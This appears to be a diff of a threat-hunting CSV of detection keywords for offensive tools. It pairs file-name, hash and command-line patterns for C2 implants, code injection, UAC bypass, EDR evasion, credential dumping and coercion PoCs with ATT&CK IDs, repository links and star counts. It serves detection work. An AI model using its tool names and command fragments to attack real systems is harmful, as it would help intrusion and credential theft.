+"*DesertNut.csproj*","offensive_tool_keyword","DesertNut","DesertNut is a proof-of-concept for code injection using subclassed window callbacks (more commonly known as PROPagate)","T1055.012 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/DesertNut","1","1","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z"
+"*DesertNut.exe*","offensive_tool_keyword","DesertNut","DesertNut is a proof-of-concept for code injection using subclassed window callbacks (more commonly known as PROPagate)","T1055.012 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/DesertNut","1","1","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z"
+"*DesertNut.sln*","offensive_tool_keyword","DesertNut","DesertNut is a proof-of-concept for code injection using subclassed window callbacks (more commonly known as PROPagate)","T1055.012 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/DesertNut","1","1","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z"
+"*DesertNut_h.cs*","offensive_tool_keyword","DesertNut","DesertNut is a proof-of-concept for code injection using subclassed window callbacks (more commonly known as PROPagate)","T1055.012 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/DesertNut","1","1","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z"
 "*-destPipe * -pipeHost * -bindPort *","offensive_tool_keyword","invoke-piper","Forward local or remote tcp ports through SMB pipes.","T1003.001 - T1048 - T1021.002 - T1021.001 - T1090","TA0002 -TA0006 - TA0008","N/A","N/A","Lateral movement","https://github.com/p3nt4/Invoke-Piper","1","0","N/A","N/A","3","284","60","2021-03-07T19:07:01Z","2017-08-03T08:06:44Z"
-"*details-c80a6994018b23dc.js*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z"
+"*details-c80a6994018b23dc.js*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z"
 "*detect ntdll.dll*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
 "*detect-hooksx64.*","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/Detect-Hooks","1","1","N/A","10","10","138","28","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z"
-"*df64a3f4eb1348cba026ff85a86f39e11a979ce50a4b4af0b9cbd2acdfc90bf0*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*df64a3f4eb1348cba026ff85a86f39e11a979ce50a4b4af0b9cbd2acdfc90bf0*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
 "*dfscoerce.py -d *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
 "*dfscoerce.py*","offensive_tool_keyword","DFSCoerce","PoC for MS-DFSNM coerce authentication using NetrDfsRemoveStdRoot and NetrDfsAddStdRoot?","T1550.001 - T1078.003 - T1046","TA0002 - TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Wh04m1001/DFSCoerce","1","1","N/A","10","7","635","78","2022-09-09T17:45:41Z","2022-06-18T12:38:37Z"
-"*dfscoerce_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*dfscoerce_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
 "*DFSCoerce-main*","offensive_tool_keyword","DFSCoerce","PoC for MS-DFSNM coerce authentication using NetrDfsRemoveStdRoot and NetrDfsAddStdRoot?","T1550.001 - T1078.003 - T1046","TA0002 - TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Wh04m1001/DFSCoerce","1","1","N/A","10","7","635","78","2022-09-09T17:45:41Z","2022-06-18T12:38:37Z"
 "*dGhlU2VtaW5vbGVzYmVhdG5vcmVkYW1l*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z"
 "*dGhlYnJvbmNvc2FyZWJldHRlcnRoYW5yYXZlbnM-*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z"
 "*dGhpc2lzYXRlc3RzdHJpbmdkb250Y2F0Y2htZQ--*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z"
-"*dhcp6.spoof.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z"
+"*dhcp6.spoof.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z"
 "*Dialupass.exe*","offensive_tool_keyword","dialupass","This utility enumerates all dialup/VPN entries on your computers. and displays their logon details: User Name. Password. and Domain. You can use it to recover a lost password of your Internet connection or VPN.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/dialupass.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*Dialupass.zip*","offensive_tool_keyword","dialupass","This utility enumerates all dialup/VPN entries on your computers. and displays their logon details: User Name. Password. and Domain. You can use it to recover a lost password of your Internet connection or VPN.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/dialupass.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*dicts*generic-usernames.txt*","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","0","N/A","6","10","N/A","N/A","N/A","N/A"
-"*dicts/ftp_pswd.txt*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4019","483","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z"
-"*dicts/ssh_default.txt*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4019","483","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z"
-"*dicts/ssh_pswd.txt*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4019","483","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z"
-"*diego-treitos/linux-smart-enumeration*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","N/A","9","10","2924","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z"
+"*dicts/ftp_pswd.txt*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z"
+"*dicts/ssh_default.txt*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z"
+"*dicts/ssh_pswd.txt*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z"
+"*diego-treitos/linux-smart-enumeration*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z"
 "*dinjector /i:* /p:*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","","N/A","","",""
 "*DInjector.csproj*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","1","private github repo","10","","N/A","","",""
 "*DInjector.Detonator*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10","","N/A","","",""
@@ -9273,14 +9421,14 @@
 "*dircreate2system.sln*","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","8","4","332","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z"
 "*dircreate2system.vcxproj*","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","8","4","332","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z"
 "*DirCreate2System-main*","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","8","4","332","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z"
-"*Direct_Syscalls_Create_Thread.c*","offensive_tool_keyword","Direct-Syscalls","Direct-Syscalls technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","1","67","10","2023-05-24T04:23:37Z","2023-05-23T06:30:54Z"
-"*Direct_Syscalls_Create_Thread.exe*","offensive_tool_keyword","Direct-Syscalls","Direct-Syscalls technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","1","67","10","2023-05-24T04:23:37Z","2023-05-23T06:30:54Z"
-"*Direct_Syscalls_Create_Thread.sln*","offensive_tool_keyword","Direct-Syscalls","Direct-Syscalls technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","1","67","10","2023-05-24T04:23:37Z","2023-05-23T06:30:54Z"
-"*Direct_Syscalls_Create_Thread.vcxproj*","offensive_tool_keyword","Direct-Syscalls","Direct-Syscalls technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","1","67","10","2023-05-24T04:23:37Z","2023-05-23T06:30:54Z"
+"*Direct_Syscalls_Create_Thread.c*","offensive_tool_keyword","Direct-Syscalls","Direct-Syscalls technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","1","68","10","2023-05-24T04:23:37Z","2023-05-23T06:30:54Z"
+"*Direct_Syscalls_Create_Thread.exe*","offensive_tool_keyword","Direct-Syscalls","Direct-Syscalls technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","1","68","10","2023-05-24T04:23:37Z","2023-05-23T06:30:54Z"
+"*Direct_Syscalls_Create_Thread.sln*","offensive_tool_keyword","Direct-Syscalls","Direct-Syscalls technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","1","68","10","2023-05-24T04:23:37Z","2023-05-23T06:30:54Z"
+"*Direct_Syscalls_Create_Thread.vcxproj*","offensive_tool_keyword","Direct-Syscalls","Direct-Syscalls technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","1","68","10","2023-05-24T04:23:37Z","2023-05-23T06:30:54Z"
 "*DirectDLL_x64.dll*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
 "*DirectDLL_x86.dll*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
 "*Directory-Traversal-Payloads.*","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","116","43","2023-09-11T17:20:51Z","2022-11-18T09:43:41Z"
-"*Direct-Syscalls-vs-Indirect-Syscalls.git*","offensive_tool_keyword","Indirect-Syscalls","Indirect syscalls serve as an evolution of direct syscalls and enable enhanced EDR evasion by legitimizing syscall command execution and return statement within the ntdll.dll memory. This stealthy operation partially implements the syscall stub in the Indirect Syscall assembly itself.","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","1","67","10","2023-05-24T04:23:37Z","2023-05-23T06:30:54Z"
+"*Direct-Syscalls-vs-Indirect-Syscalls.git*","offensive_tool_keyword","Indirect-Syscalls","Indirect syscalls serve as an evolution of direct syscalls and enable enhanced EDR evasion by legitimizing syscall command execution and return statement within the ntdll.dll memory. This stealthy operation partially implements the syscall stub in the Indirect Syscall assembly itself.","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","1","68","10","2023-05-24T04:23:37Z","2023-05-23T06:30:54Z"
 "*dirkjan@sanoweb.nl*","offensive_tool_keyword","ldapdomaindump","Active Directory information dumper via LDAP","T1087 - T1005 - T1016","TA0007","N/A","N/A","Credential Access","https://github.com/dirkjanm/ldapdomaindump","1","1","N/A","N/A","10","970","176","2023-09-06T05:50:30Z","2016-05-24T18:46:56Z"
 "*dirkjanm/ldapdomaindump*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
 "*dirkjanm/PKINITtools*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
@@ -9288,26 +9436,26 @@
 "*dirscanner.py*","offensive_tool_keyword","RedTeam_toolkit","Red Team Toolkit is an Open-Source Django Offensive Web-App which is keeping the useful offensive tools used in the red-teaming together","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/signorrayan/RedTeam_toolkit","1","1","N/A","N/A","5","499","114","2023-09-27T04:40:54Z","2021-08-18T08:58:14Z"
 "*dirscraper*","offensive_tool_keyword","dirscraper","Dirscraper is an OSINT scanning tool which assists penetration testers in identifying hidden. or previously unknown. directories on a domain or subdomain. This helps greatly in the recon stage of pentesting as it provide pentesters with a larger attack surface for the specific domain.","T1596 - T1530 - T1201","TA0040 - ","N/A","N/A","Information Gathering","https://github.com/Cillian-Collins/dirscraper","1","1","N/A","N/A","3","212","34","2019-02-24T12:22:47Z","2019-02-21T23:06:58Z"
 "*dirsearch -r -w /usr/share/wordlists/seclists/Discovery/Web-Content/quickhits.txt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
-"*dirsearch*","offensive_tool_keyword","dirsearch","Dirsearch is a mature command-line tool designed to brute force directories and files in webservers.","T1110 - T1114 - T1100 - T1313","TA0001 - TA0007","N/A","N/A","Web Attacks","https://github.com/maurosoria/dirsearch","1","0","N/A","N/A","10","10324","2209","2023-10-03T11:22:52Z","2013-04-30T15:57:40Z"
-"*dirTraversal.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z"
-"*dirTraversal-nix.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z"
-"*dirTraversal-win.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z"
+"*dirsearch*","offensive_tool_keyword","dirsearch","Dirsearch is a mature command-line tool designed to brute force directories and files in webservers.","T1110 - T1114 - T1100 - T1313","TA0001 - TA0007","N/A","N/A","Web Attacks","https://github.com/maurosoria/dirsearch","1","0","N/A","N/A","10","10325","2209","2023-10-03T11:22:52Z","2013-04-30T15:57:40Z"
+"*dirTraversal.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z"
+"*dirTraversal-nix.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z"
+"*dirTraversal-win.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z"
 "*dirty_sock*","offensive_tool_keyword","POC","dirty_sock: Linux Privilege Escalation (via snapd) In January 2019. current versions of Ubuntu Linux were found to be vulnerable to local privilege escalation due to a bug in the snapd API. This repository contains the original exploit POC","T1210 - T1211 - T1212 - T1547","TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/initstring/dirty_sock","1","1","N/A","N/A","7","640","159","2019-05-09T21:34:26Z","2019-02-12T06:02:06Z"
